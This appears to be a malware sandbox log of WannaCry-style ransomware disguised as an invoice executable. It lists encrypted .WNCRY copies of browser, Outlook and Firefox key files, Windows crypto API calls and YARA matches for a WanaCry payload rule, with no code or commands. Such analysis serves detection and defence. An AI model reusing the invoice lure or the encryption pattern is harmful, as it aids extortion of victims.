            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\90SNK17T\oneDs_f2e0f4a029670f10d892[1].js.WNCRYT entropy: 7.99920831239Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\AN5UOLP8\ConvergedLoginPaginatedStrings.en-gb_BxKM4IRLudkIao5qoVhSFA2[1].js.WNCRYT entropy: 7.99457580934Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db.WNCRYT entropy: 7.99982687688Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\AN5UOLP8\ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOqiqEgQ2[1].js.WNCRYT entropy: 7.99459450107Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db.WNCRYT entropy: 7.99632261397Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db.WNCRYT entropy: 7.99985568418Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db.WNCRYT entropy: 7.9940420487Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_background.js.WNCRYT entropy: 7.99963243635Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_window.js.WNCRYT entropy: 7.99940380078Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\flapper.gif.WNCRYT entropy: 7.99731989835Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\0JQ5B395\microsoft-365-logo-01d5ecd01a[1].png.WNCRYT entropy: 7.99186739012Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\0JQ5B395\pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7[1].js.WNCRYT entropy: 7.99525127513Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\6EVGB5XB\pwa-bootstrap-5e7af218e953d095fabf[1].js.WNCRYT entropy: 7.99793675084Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\256.png.WNCRYT entropy: 7.99279688532Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\6EVGB5XB\pwa-mru.2ce72562ad7c0ae7059c.chunk.v7[1].js.WNCRYT entropy: 7.99519416221Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\7OUVBIZR\pwa-vendor-bundle-ba2888a24179bf152f3d[1].js.WNCRYT entropy: 7.99972298792Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\Desktop\s.wnry entropy: 7.998263053Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\OB7JJZIK\otel-logger-104bffe9378b8041455c[1].js.WNCRYT entropy: 7.9982805142Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\OB7JJZIK\pwa-bundle-3a99f64809c6780df035[1].js.WNCRYT entropy: 7.99984900179Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\OB7JJZIK\pwa-forms-group~mru~officeforms-group-forms~officeforms-my-forms~places.bcdc404c7fe22f14ccad.chunk.v7[1].js.WNCRYT entropy: 7.99592796159Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\OB7JJZIK\sharedscripts-939520eada[1].js.WNCRYT entropy: 7.99666016174Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\Documents\Outlook Files\Outlook Data File - NoEmail.pst.WNCRYT entropy: 7.99926263175Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AppData\CacheStorage\CacheStorage.edb.WNCRYT entropy: 7.99989075045Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\Documents\Outlook Files\Outlook Data File - NoEmail.pst entropy: 7.99925170269Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb.WNCRYT entropy: 7.99988710524Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\-U2ww19iycr3M_DiD25JdVUDdqk.br[1].js.WNCRYT entropy: 7.99807321117Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\584482RVjBIoEvVSe0RsuS1I4YQ.br[1].js.WNCRYT entropy: 7.99533292633Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\Desktop\t.wnry entropy: 7.99727613788Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\58urCM4ERwTmgZF8atjxpMnY4I4.br[1].js.WNCRYT entropy: 7.99948246376Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\5fBhIWX2NfxoiM-aOLeKJczoLSY.br[1].js.WNCRYT entropy: 7.99917311495Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\5_KhThI0onehz_-3sl58j0dOeLI.br[1].js.WNCRYT entropy: 7.99862496154Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\aABLNT_FV45QjYQfnRHrBCAk4GU[1].js.WNCRYT entropy: 7.99860709509Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\DccpWCpoNzCwM4Qymi_Ji67Ilso.br[1].js.WNCRYT entropy: 7.99875831532Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\dMxp0YQLz5hOQviuFXI5GuahQMU.br[1].js.WNCRYT entropy: 7.99890340777Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\D_0mE1U1YmZvpLaz5wDHB6P-DAI.br[1].js.WNCRYT entropy: 7.9990600479Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\90SNK17T\oneDs_f2e0f4a029670f10d892[1].js.WNCRY (copy) entropy: 7.99920831239Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\AN5UOLP8\ConvergedLoginPaginatedStrings.en-gb_BxKM4IRLudkIao5qoVhSFA2[1].js.WNCRY (copy) entropy: 7.99457580934Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\AN5UOLP8\ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOqiqEgQ2[1].js.WNCRY (copy) entropy: 7.99459450107Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db.WNCRY (copy) entropy: 7.99985568418Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\0JQ5B395\microsoft-365-logo-01d5ecd01a[1].png.WNCRY (copy) entropy: 7.99186739012Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\0JQ5B395\pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7[1].js.WNCRY (copy) entropy: 7.99525127513Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\6EVGB5XB\pwa-bootstrap-5e7af218e953d095fabf[1].js.WNCRY (copy) entropy: 7.99793675084Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\6EVGB5XB\pwa-mru.2ce72562ad7c0ae7059c.chunk.v7[1].js.WNCRY (copy) entropy: 7.99519416221Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\7OUVBIZR\pwa-vendor-bundle-ba2888a24179bf152f3d[1].js.WNCRY (copy) entropy: 7.99972298792Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\OB7JJZIK\otel-logger-104bffe9378b8041455c[1].js.WNCRY (copy) entropy: 7.9982805142Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\OB7JJZIK\pwa-bundle-3a99f64809c6780df035[1].js.WNCRY (copy) entropy: 7.99984900179Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\OB7JJZIK\pwa-forms-group~mru~officeforms-group-forms~officeforms-my-forms~places.bcdc404c7fe22f14ccad.chunk.v7[1].js.WNCRY (copy) entropy: 7.99592796159Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\OB7JJZIK\sharedscripts-939520eada[1].js.WNCRY (copy) entropy: 7.99666016174Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AppData\CacheStorage\CacheStorage.edb.WNCRY (copy) entropy: 7.99989075045Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb.WNCRY (copy) entropy: 7.99988710524Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\-U2ww19iycr3M_DiD25JdVUDdqk.br[1].js.WNCRY (copy) entropy: 7.99807321117Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\584482RVjBIoEvVSe0RsuS1I4YQ.br[1].js.WNCRY (copy) entropy: 7.99533292633Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\58urCM4ERwTmgZF8atjxpMnY4I4.br[1].js.WNCRY (copy) entropy: 7.99948246376Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\5fBhIWX2NfxoiM-aOLeKJczoLSY.br[1].js.WNCRY (copy) entropy: 7.99917311495Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\5_KhThI0onehz_-3sl58j0dOeLI.br[1].js.WNCRY (copy) entropy: 7.99862496154Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\aABLNT_FV45QjYQfnRHrBCAk4GU[1].js.WNCRY (copy) entropy: 7.99860709509Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\DccpWCpoNzCwM4Qymi_Ji67Ilso.br[1].js.WNCRY (copy) entropy: 7.99875831532Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\dMxp0YQLz5hOQviuFXI5GuahQMU.br[1].js.WNCRY (copy) entropy: 7.99890340777Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\D_0mE1U1YmZvpLaz5wDHB6P-DAI.br[1].js.WNCRY (copy) entropy: 7.9990600479Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\EYNLM9RfkEXFtD8WH1unvJjwzGA.br[1].js.WNCRY (copy) entropy: 7.99043912244Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\KF9j9oJUfaaKiX-84yf0U337ge8.br[1].js.WNCRY (copy) entropy: 7.99990849273Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\Kwh038ybdvX_puLwdopqHydJtVM.br[1].js.WNCRY (copy) entropy: 7.9995679726Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\mb8fkd60iW7q4wvyDIlCm9OOn10.br[1].js.WNCRY (copy) entropy: 7.9960800471Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\MgSq5EEOyYvlI1qVlLOXfgRHmzM.br[1].js.WNCRY (copy) entropy: 7.99802962828Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\pqKAmz-4RXsuUf_YO-8_wQDepUQ.br[1].js.WNCRY (copy) entropy: 7.99590606653Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\tIa_X3QDXj2Izj2HpQ_Mo9f1WiM.br[1].js.WNCRY (copy) entropy: 7.99882085293Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\wokAADULDNIRJUcpGmEjmH9QAB0.br[1].js.WNCRY (copy) entropy: 7.99940273021Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\XDTV5Ztdmvo1jmUE21mPICYC5h8.br[1].js.WNCRY (copy) entropy: 7.99962939996Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\xIW3D5oXL8xIpGjHoiGVJS_B4mg.br[1].js.WNCRY (copy) entropy: 7.99700668457Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\YfXD9vOw8__a60l-k1HNCxSbem4.br[1].js.WNCRY (copy) entropy: 7.99694154247Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\yNwdh0ra_6sDoSuCVMI8Wjl58UM.br[1].js.WNCRY (copy) entropy: 7.99787015795Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\09QWLN0Z\4tiHI4cTzqiixje34Lb3KTOm39Q[1].js.WNCRY (copy) entropy: 7.99671244277Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\09QWLN0Z\th[1].png.WNCRY (copy) entropy: 7.9910278599Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\09QWLN0Z\th[2].png.WNCRY (copy) entropy: 7.99088540788Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\7TU8ICAJ\6hU_LneafI_NFLeDvM367ebFaKQ[1].js.WNCRY (copy) entropy: 7.99037158838Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\7TU8ICAJ\th[2].png.WNCRY (copy) entropy: 7.99141359559Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\7TU8ICAJ\th[3].png.WNCRY (copy) entropy: 7.99304008674Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\HPRDNLKN\th[1].png.WNCRY (copy) entropy: 7.99069753968Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\HPRDNLKN\th[1].svg.WNCRY (copy) entropy: 7.99842666446Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\QTRC1JK9\th[1].svg.WNCRY (copy) entropy: 7.99823264997Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\QTRC1JK9\th[2].png.WNCRY (copy) entropy: 7.99234076161Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\QTRC1JK9\X6j0qPgNij1n_IogMJrgYaT9Kp8[1].js.WNCRY (copy) entropy: 7.99175047349Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\QTRC1JK9\y1DovzXWmZOic4QXLXu-qBKEMRM.br[1].js.WNCRY (copy) entropy: 7.99733463819Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb.WNCRY (copy) entropy: 7.99989735433Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\IndexedDB.edb.WNCRY (copy) entropy: 7.99990451898Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\GLEAM-DARK.svg.WNCRY (copy) entropy: 7.99811760784Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\GLEAM-LIGHT.svg.WNCRY (copy) entropy: 7.99829537033Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cert9.db.WNCRY (copy) entropy: 7.99919248056Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\key4.db.WNCRY (copy) entropy: 7.99921736722Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Temp\19.WNCRYT (copy) entropy: 7.99931242378Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Temp\20.WNCRYT (copy) entropy: 7.99937050114Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Temp\42.WNCRYT (copy) entropy: 7.99925170269Jump to dropped file
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Code function: 10_2_10003F00 GetFileAttributesA,GetFileAttributesA,CreateFileA,GetFileSize,GlobalAlloc,ReadFile,GetFileAttributesA,CryptImportKey,_local_unwind2,_local_unwind2
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Code function: 10_2_10003AC0 CryptImportKey,CryptImportKey,CryptDestroyKey
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Code function: 10_2_10004440 CryptAcquireContextA,wcsrchr,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt

            System Summary

            Source: 10.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.a48ba8.0.unpack, type: UNPACKEDPE, Matched rule: WanaCry Payload, Author: kevoreilly
            Source: 10.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.10000000.1.unpack, type: UNPACKEDPE, Matched rule: WanaCry Payload, Author: kevoreilly
